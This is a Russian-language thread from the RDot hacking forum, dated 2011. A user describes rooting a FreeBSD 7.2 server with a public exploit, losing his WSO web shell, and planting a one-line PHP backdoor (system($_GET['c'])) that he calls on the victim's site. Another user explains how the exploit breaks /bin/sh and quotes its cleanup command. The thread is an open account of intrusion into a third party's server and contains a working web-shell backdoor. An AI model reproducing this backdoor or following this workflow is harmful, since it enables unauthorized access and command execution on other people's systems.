RDot

RDot (https://rdot.org/forum/index.php)
-   Повышение привилегий/Privilege escalation (https://rdot.org/forum/forumdisplay.php?f=24)
-   -   sh.core (https://rdot.org/forum/showthread.php?t=1413)

Kernet 19.04.2011 21:33

sh.core
 
Добрый вечер, уважаемые.
Значит ситуация такая, порутал фря 7.2, сплойтом http://www.exploit-db.com/exploits/14688/, после чего мой вебшелл(WSO) перестал выполнять команды в Console, создал файл с содержимым
Код:

<?php
system($_GET['c']);
?>

и при вызове victim.com/backdoor.php?c=ls -la
в корневой директории сайта появляется файл sh.core, бинарный.
Я так подозреваю что-то произошло с консолью, что даже бек не открыть, что делать, как быть?)
//Остался суидник, но опять-же через шелл не могу его запустить :\
//Биндпорты, бекконекты все закрыты.

Andrey1800 19.04.2011 21:37

этот сплоит вешает sh. кстати там вначале написано, что делать в этом случае(если конечно все делалось по инструкции)
Код:

cleanup:
 # cp -f /tmp/sh2 /bin/sh
 #

ну а теперь только ждать ребута системы, или пока админ поправит все

Kernet 19.04.2011 22:04

Цитата:

этот сплоит вешает sh. кстати там вначале написано, что делать в этом случае(если конечно все делалось по инструкции)
По инструкции, на эту команду мне выдало, что text console busy )
//Админ пришел, починил ^^
Что это за файл-то sh.core? Это тип Core Dumped и SH крашится?)

Andrey1800 19.04.2011 22:15

core dump, да


Часовой пояс GMT +3, время: 02:02.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot